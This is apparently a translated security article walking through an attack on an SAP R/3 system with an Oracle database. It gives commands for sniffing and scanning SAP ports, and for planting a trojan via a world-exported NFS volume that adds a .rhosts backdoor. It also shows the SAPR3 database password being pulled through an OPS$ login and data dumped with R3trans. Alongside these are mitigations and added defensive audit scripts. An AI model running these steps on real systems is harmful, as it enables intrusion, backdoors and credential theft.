We hack an SAP database

Jochen Hein

$Id: ora-hack.xml,v 1.3 03/01/2002 18:29:36 jhein Exp $

First of all: how to hack an SAP system, just for fun. Kids, don't try this at home. We only use standard techniques that every administrator should have known about for a long time.

------------------------------------------------------------------------------
1.1. Hacking with Unix and network tools

We know nothing (except that there should be an SAP R/3 system and, chances are good, an Oracle database), and we have a laptop. By chance we find a live network socket (or we tap in with a cheap mini hub for fifty). And then we listen to what comes by.

SAP R/3 systems can be reachable on many different ports. Usually we find the application server on a port between 3200 and 3299 and the message server between 3600 and 3699. The last two digits are the so-called system number. These ports can be changed in the profile, but one can assume that most systems run in this configuration. Figure 1 shows an example call of tcpdump, but there are other tools as well.

Figure 1: Packet sniffer

    #!/bin/sh
    tcpdump -n -i eth0 'tcp[13] & 3 != 0 and \
        ((tcp[2:2] >= 3200 and tcp[2:2] < 3300) or \
         (tcp[2:2] >= 3600 and tcp[2:2] < 3700))'

The result shows only the connection setup (and teardown) to an application server or a message server. The first expression, tcp[13] & 3 != 0, filters out exactly those TCP packets (SYN or FIN flag set). Only IP addresses and port numbers are displayed, no names. We note the result (Figure 2, shown here shortened).

Figure 2: Result of the sniffer

    192.168.1.1.4722 > 192.168.10.1.3200

Now we know one or more SAP servers and can analyze them further. The defence against this first step is a switched network, where each computer sees only the packets intended for it.
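Added example, not part of the original article: the same port ranges used for detection rather than attack. The script parses tcpdump output in the format of Figure 2 and reports connection attempts to SAP ports from sources outside the known client networks. The allowlist network and the sample lines are constructed; the gateway range (33xx) is taken from the article's later port-scan discussion in section 1.3.

```python
import ipaddress
import re

# SAP R/3 default port ranges as described in the text; the last two digits
# of the port are the system number.
PORT_RANGES = {
    "dispatcher": (3200, 3299),
    "gateway": (3300, 3399),
    "message server": (3600, 3699),
}

# Matches the address form "tcpdump -n" prints: a.b.c.d.port > a.b.c.d.port
LINE_RE = re.compile(
    r"(\d+\.\d+\.\d+\.\d+)\.(\d+)\s*>\s*(\d+\.\d+\.\d+\.\d+)\.(\d+)"
)


def classify_port(port):
    """Return (service, system number) for a default SAP port, else None."""
    for service, (low, high) in PORT_RANGES.items():
        if low <= port <= high:
            return service, port % 100
    return None


def parse_line(line):
    """Extract (src_ip, src_port, dst_ip, dst_port) from one tcpdump line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return m.group(1), int(m.group(2)), m.group(3), int(m.group(4))


def find_unexpected_clients(lines, allowed_clients):
    """Report SAP connection attempts whose source is not in an allowed network.

    allowed_clients: CIDR strings for the known SAP GUI / application-server
    networks (an assumption for this example). Returns a list of
    (src_ip, dst_ip, service, system_number) tuples.
    """
    nets = [ipaddress.ip_network(n) for n in allowed_clients]
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src_ip, _, dst_ip, dst_port = parsed
        svc = classify_port(dst_port)
        if svc is None:
            continue  # not an SAP dispatcher/gateway/message-server port
        if not any(ipaddress.ip_address(src_ip) in n for n in nets):
            hits.append((src_ip, dst_ip, svc[0], svc[1]))
    return hits


# Constructed sample lines in the format of Figure 2 (not real captured data).
SAMPLE = [
    "192.168.1.1.4722 > 192.168.10.1.3200",
    "192.168.1.7.1033 > 192.168.10.1.3600",
    "192.168.1.250.2345 > 192.168.10.1.3200",
    "192.168.1.251.40001 > 192.168.10.1.1527",  # Oracle port, outside SAP ranges
]

if __name__ == "__main__":
    # 192.168.1.0/25 is the constructed "known clients" network.
    for hit in find_unexpected_clients(SAMPLE, ["192.168.1.0/25"]):
        print("unexpected client %s -> %s (%s, system number %02d)" % hit)
```

Fed with the live output of the tcpdump call in Figure 1, the same function turns the attacker's discovery filter into an alert on any new machine that starts talking to the dispatcher or message server.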
There are attacks against switches that degrade them into hubs, so that a sniffer can be used again afterwards. We note the addresses active in the network and choose a suitable IP address for what follows (hoping that we are not noticed). Helpful for the system administrator would be a tool such as arpwatch, which at least reports new computers. The intruder can of course use the MAC and IP address of a workstation in the evening; then only time restrictions and appropriate monitoring in the network help.

With a special Linux system on the laptop, the recording is practically invisible to the network administrator. The special thing about that Linux is a kernel patch (perhaps at http://linux.davecentral.com/projects/stealthkernelpatch/) which prevents the system from ever sending a packet. Otherwise an Intrusion Detection System (IDS) could, for example, report that a computer with a network card in promiscuous mode is active.

In the next step we guess a free IP address (possibly that of a PC switched off for the night) and use it on our laptop. If DNS access turns out to be necessary, listen for packets to port 53 and run a suitable server locally. With a little luck we can do without it (if the name server runs with query logging, we could be recognized). We connect the program sapgui to that machine and port, so that we get the system ID in the status bar (Figure 3). With Oracle this is also equal to the Oracle SID. If we have found a port 36nr, we use the program lgtst (included with the Unix SAPGUI) to try to get more information about the system; in that case load balancing is presumably in use.

Figure 3: Connecting with SAPGUI

    sapgui /H/victim-ip/S/victim-port

------------------------------------------------------------------------------
1.2. A short detour

From here on we are active in the network. If the system administrator has an intrusion detection system, watches for port scans, or reads his log files, he might notice something. Don't do this in any other network; even in your own, talk to your colleagues first. You have been warned.

First we find out what kind of system it is (tools for that are available on every street corner). Depending on the system it may be appropriate to attack the system directly; rootshell is always a good source for that. telnet perhaps reveals the name of the operating system; nmap -O victim-ip may guess the operating system. This is a Unix system, so I know my way around. A first, rather brazen attempt: log in as root with the rlogin command. Yes, sometimes that works beautifully; game over, thank you for playing.

On Unix systems the command showmount -e lists the directories exported via NFS. With a little luck important volumes have been released to all computers, possibly even writable. A shocking example is shown in Figure 4.

Figure 4: NFS exploit

    cracker# showmount -e victim-ip
    Export list for victim-ip:
    /sapmnt/SID (everyone)

Aha: here the SID of the system shows up. We saw that already with the SAPGUI and the port scan. Much more useful, however, is that we will be able to mount the NFS volume, create a user sidadm, and replace any program (yes, this is a practical example that actually exists; I find it almost negligent). The user sidadm owns the data of the R/3 system; on Unix the Oracle database belongs to the user orasid. Figure 5 shows a possible approach to replacing Unix programs. With a little luck nobody notices, and if someone does, it is hard to understand what happened (or do you keep logs of successful NFS mounts?).

Figure 5: Planting a trojan horse

    cracker# mount -t nfs victim-ip:/sapmnt/SID /mnt
    cracker# ls -l
    ... in this listing we find the numerical user ID of the Unix user sidadm ...
    cracker# adduser -u number sidadm
    cracker# su - sidadm
    sidadm> cd /mnt/exe
    sidadm> mv brarchive .brarchive
    sidadm> cat > brarchive
    #!/bin/sh
    # create a backdoor
    echo my-ip >> $HOME/.rhosts
    # and start the old program so that nothing is noticed
    exec /sapmnt/SID/exe/.brarchive
    Ctrl-C
    sidadm> chmod a+x brarchive

Now just wait a day (namely until brarchive runs the next time) and we have won. We can log in with rlogin as sidadm without a password. Thank you very much for this simple game.

------------------------------------------------------------------------------
1.3. Back to SAP

Now we are searching for the database server. A port scan of the computer found above perhaps reveals the message server and perhaps an Oracle port. Figure 6 contains a good example.

Figure 6: Calling a port scanner

    nmap -p 3200-3699 <ip-address>
    nmap -p 1527 <ip-address>

These are the ports of the SAP dispatcher (32xx), any gateway processes (33xx), and the message server (36xx). Then look for an Oracle listener; some people say it runs on port 1521 by default. Hm, guess and check: try the hosts nearby (change the last digit of the IP address)! Other servers may reveal further SAP systems. Besides, one might exploit trust relationships between different systems, but that is not our goal today.

Assumption: there is one central instance, i.e. database and R/3 run on one computer. Whether this assumption holds can be found out with the program sapinfo. The program is available on the GUI CD in the RFC SDK. Figure 7 contains another example.

Figure 7: The program sapinfo

    cracker# sapinfo ashost=ip-address sysnr=n
    SAP System Information
    ---------------------------------------------
    Destination         hostname_SID_nr
    Host                hostname
    System ID           SID
    Database            SID
    DB host             hostname
    DB system           ORACLE
    SAP release         40B
    SAP kernel release  40B
    RFC protocol        011
    Characters          1100
    Integers            BIG
    Floating P.         IE3
    SAP machine id      320
    Time Zone           3600 (Daylight saving time)

So much for a computer with only one network card.
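Looking back at the export list in Figure 4 of section 1.2: the whole trojan-horse step depended on an SAP volume being exported to everyone. As an added example (not part of the original article), here is a small audit that parses showmount -e output and flags exactly that condition, so it can be run against every NFS server in an SAP landscape. The prefixes /usr/sap and /oracle and the host names in the sample are assumptions, not taken from the article.

```python
import re

# Directory prefixes that hold SAP kernel binaries or database files.
# /sapmnt comes from the article (Figure 4); /usr/sap and /oracle are
# assumed typical locations for this example.
SENSITIVE_PREFIXES = ("/sapmnt", "/usr/sap", "/oracle")

# One export line: "<path> <client>[,<client>...]"
EXPORT_RE = re.compile(r"^(\S+)\s+(.+)$")


def parse_export_list(text):
    """Parse showmount -e output into {path: [client, ...]}."""
    exports = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Export list"):
            continue  # skip the header line showmount prints
        m = EXPORT_RE.match(line)
        if not m:
            continue
        path, clients = m.group(1), m.group(2)
        exports[path] = [c.strip() for c in clients.split(",")]
    return exports


def audit_exports(text):
    """Return findings as (path, severity, reason) tuples.

    critical: an SAP volume is exported to the whole world (the Figure 4 case)
    high:     any other world-readable export
    info:     an SAP volume exported, but only to named clients
    """
    findings = []
    for path, clients in parse_export_list(text).items():
        sensitive = path.startswith(SENSITIVE_PREFIXES)
        world = any(c in ("(everyone)", "*") for c in clients)
        if world and sensitive:
            findings.append((path, "critical", "SAP volume exported to everyone"))
        elif world:
            findings.append((path, "high", "exported to everyone"))
        elif sensitive:
            findings.append((path, "info",
                             "SAP volume exported to %s" % ", ".join(clients)))
    return findings


# Constructed sample output in the format of Figure 4 (not real data).
SAMPLE_EXPORTS = """\
Export list for victim-ip:
/sapmnt/SID (everyone)
/export/home app1.example,app2.example
/oracle/SID  db2.example
"""

if __name__ == "__main__":
    for path, severity, reason in audit_exports(SAMPLE_EXPORTS):
        print("%-8s %-20s %s" % (severity, path, reason))
```

The fix the finding points at is the one the article's conclusion asks for: export SAP volumes only to the named application servers, never to everyone, and keep the NFS mount logs the author wonders about.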
If the computer is multi-homed, then perhaps the output of lgtst helps us. Otherwise either targeted guessing or access to the victim's DNS server (if available) helps.

We now know:

- the IP address(es) of the victim,
- the system number of the R/3 system (the last two digits of the SAP ports),
- the system ID of the system and of the Oracle database, and
- the name of the database server.

Thus armed we go on to the actual goal: access to the SAP database.

------------------------------------------------------------------------------
1.4. Hacking the Oracle database

We create a SQL*Net V2 configuration which hopefully gives us access to the database. We need a sqlnet.ora file (SAP standard, see Figure 8) and a tnsnames.ora file (Figure 9). With the environment variable TNS_ADMIN we can specify the path to these files; on our laptop (where the Oracle programs are installed as well) we are free to do as we like anyway.

Figure 8: The file sqlnet.ora

    ################
    # Filename......: sqlnet.ora
    # Name..........: template
    # Date..........:
    ################
    AUTOMATIC_IPC = ON
    TRACE_LEVEL_CLIENT = OFF
    SQLNET.EXPIRE_TIME = 0
    NAMES.DEFAULT_DOMAIN = world
    NAME.DEFAULT_ZONE = world
    # SQLNET.AUTHENTICATION_SERVICES = (ALL)

Figure 9: The file tnsnames.ora

    SID.world =
      (DESCRIPTION =
        (ADDRESS_LIST =
          (ADDRESS =
            (COMMUNITY = sap.world)
            (PROTOCOL = TCP)
            (Host = hostname)
            (Port = 1527)
          )
        )
        (CONNECT_DATA =
          (SID = SID)
          (GLOBAL_NAME = SID.world)
        )
      )

If the default passwords have not been changed, we can connect to the database with the command connect sapr3/sap@SID in svrmgrl. Otherwise we have to use the OPS$ mechanism of the Oracle database to find out the password of the user SAPR3 (Figure 10). For that we have to create a user sidadm on the laptop.

Figure 10: Oracle hack

    sidadm> setenv TNS_ADMIN $HOME/
    sidadm> setenv ORACLE_HOME /oracle/SID
    sidadm> setenv ORACLE_SID SID
    sidadm> svrmgrl

    Oracle Server Manager Release 3.0.6.0.0 - Production

    (c) Copyright 1999 Oracle Corporation.  All Rights Reserved.

    Oracle8 Enterprise Edition Release 8.0.6.1.0 - Production
    PL/SQL Release 8.0.6.1.0 - Production

    SVRMGR> connect /@SID
    Connected.
    SVRMGR> select * from sapuser;
    USERID   PASSWD
    ------   ------
    SAPR3    geheim
    1 row selected.
    SVRMGR> connect SAPR3/geheim@SID
    Connected.
    SVRMGR>

We connect to the database as the OPS$ user. This user is created in Oracle as "identified externally", so we do not have to specify a password here. Since we are not working directly on the database server, we specify the SID, which is resolved using the SQL*Net V2 configuration. With the password stored in the table SAPUSER we can now log on to the database as SAPR3.

------------------------------------------------------------------------------
1.5. Ideas

In the current SAP R/3 versions the password in the table SAPUSER is stored encrypted. So it is no longer quite that simple; there are two paths one can follow:

An attack on the encryption with cryptographic methods. I would like to try that one day, but at least in the medium term I lack the time. OSS Note 150790 makes this idea particularly appealing: the encryption uses the general SAP encryption routine. That suggests one could also crack the passwords of R/3 users with it.

If one installs tools such as R3trans on the laptop we used for the attack, one could gain access to the database that way. Since the encryption is implemented in R3trans, one should be able to access all R/3 data without the above analysis. A quick test shows me the following:

Figure 11: R3trans for database access

    sidadm> export PATH="$PATH:/oracle/SID/817_32/bin/:/usr/sap/SID/SYS/exe/run"
    sidadm> export dbms_type=ora
    sidadm> export DIR_LIBRARY=/usr/sap/SID/SYS/exe/run
    sidadm> export dbs_ora_tnsname=SID
    sidadm> export TNS_ADMIN=/home/sidadm
    sidadm> cat control
    export
    compress=no
    client=000
    # select table where name = T000
    select * from T000
    sidadm> R3trans control
    ...
    sidadm> strings trans.dat
    ...
    q 000SAP AG Walldorf DEM [...]
    q 001Auslieferungsmandant R11 Kundstadt EUR [...]
    ...

Here one only needs to imagine what an attacker could do: export, clientremove ;-), analyze tables in a WAS/IDES, and generate a transport file in a WAS, e.g. with a user with sufficient permissions or lots of suitable documents. If R3trans can connect to the database, then the password can be sniffed with tcpdump or dsniff (http://www.monkey.org/~dugsong/dsniff/, probably dsniff -s 4096 [1]). After that svrmgrl can be used as usual. Congratulations!

------------------------------------------------------------------------------
1.6. Considerations on the SAP password encryption

What SAP calls encryption may in fact be only an obfuscation. If the encryption is considered as a function f of the password, then the encrypted password is the result f(password). Since programs such as R3trans are able, without any further settings, to transform the encrypted password back into plaintext, there exists a function f^-1 for which f^-1(f(password)) = password. This obfuscation is (as shown above) very easy to outwit, because I can have any obfuscated password decrypted by R3trans. Thus the cryptographic analysis of the "encryption" is only of sporting interest; the pragmatic approach is simple: use the program R3trans to decrypt that particular password.

------------------------------------------------------------------------------
1.7. Conclusion

Thank you very much for the flowers. The only workaround that comes to my mind is to put a packet filter in front of the Oracle ports and to use a switched network. Besides, you should think about a firewall between the SAP servers and the rest of the network. Really. Then the NFS hack might have failed as well. A more intensive search through several documents finally turned up the file protocol.ora.
In this file, the entry validnode_checking turns on an IP-based check. The entry invited_nodes then contains the allowed IP addresses or host names. Figure 12 shows a suitable example. Because of an Oracle bug you should never use host names: if a host name cannot be resolved, the access restriction is lifted without any message, and everyone can read all the data again!

Figure 12: The file protocol.ora

    tcp.nodelay = true
    tcp.validnode_checking = yes
    tcp.invited_nodes = (ip-address, ip-address)

A disadvantage of this configuration is that a new application server, or a system from the transport network (for test imports), must be entered here. The higher security is thus bought with more effort and possibly laborious troubleshooting if you have forgotten this setting. The really big problem, in my view, is that SAP is insecure in its default installation, the manuals contain no information about this problem, and the fix is well hidden in OSS. Especially systems with very sensitive information, such as SAP R/3, should not show such gaps in the default installation. The problem has been known since 1999, but so far I have not seen any changes in the installations.

------------------------------------------------------------------------------
1.8. OSS notes and R/3 versions

- Note 186119: from 4.5B on, the table SAPUSER is encrypted. Valid in 4.0x, 4.5x, 4.6x.
- According to the guide, no change from 6.10 on.
- For WAS/6.10 the database user is SAP<SID>: Note 361641: creating the OPS$ user on UNIX, R/3 >= 6.10: use the script oradbusr.sql (see also Note 50088).

[1] Why does dsniff not capture Oracle logins? Increase the default snaplen with dsniff -s 4096. Oracle logins can be quite chatty...
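An added example, not from the article: a checker for the protocol.ora settings of Figure 12 that enforces the host-name caveat above. It parses the file, verifies that tcp.validnode_checking is yes and tcp.invited_nodes is non-empty, and rejects any invited node that is not an IP literal, since an unresolvable host name silently disables the whole restriction. The two sample files and their addresses are constructed, not taken from a real system.

```python
import ipaddress


def parse_protocol_ora(text):
    """Parse 'key = value' lines of protocol.ora; '#' starts a comment."""
    params = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue
        key, value = line.split("=", 1)
        params[key.strip().lower()] = value.strip()
    return params


def split_node_list(value):
    """Turn '(a, b, c)' into ['a', 'b', 'c']."""
    value = value.strip()
    if value.startswith("(") and value.endswith(")"):
        value = value[1:-1]
    return [v.strip() for v in value.split(",") if v.strip()]


def is_ip_literal(node):
    """True for an IPv4/IPv6 address literal, False for a host name."""
    try:
        ipaddress.ip_address(node)
        return True
    except ValueError:
        return False


def check_protocol_ora(text):
    """Return a list of problems; an empty list means the node check is sound."""
    params = parse_protocol_ora(text)
    problems = []
    if params.get("tcp.validnode_checking", "").lower() != "yes":
        problems.append(
            "tcp.validnode_checking is not 'yes': no IP-based check is active")
    nodes = split_node_list(params.get("tcp.invited_nodes", ""))
    if not nodes:
        problems.append("tcp.invited_nodes is missing or empty")
    for node in nodes:
        if not is_ip_literal(node):
            # The Oracle bug described in the text: an unresolvable host name
            # lifts the restriction without any message.
            problems.append(
                "invited node %r is a host name; if it fails to resolve the "
                "restriction is silently dropped" % node)
    return problems


# Constructed sample files (not from the article): a weak and a corrected one.
WEAK = """\
tcp.nodelay = true
tcp.validnode_checking = yes
tcp.invited_nodes = (appsrv1.example.com, 192.168.10.5)
"""

FIXED = """\
tcp.nodelay = true
tcp.validnode_checking = yes
tcp.invited_nodes = (192.168.10.4, 192.168.10.5)
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("fixed", FIXED)):
        print(name, check_protocol_ora(text) or ["ok"])
```

Running the check from a change-management hook catches the two failure modes the article names: a forgotten entry when a new application server or transport-network system is added, and a host name that quietly turns the restriction off.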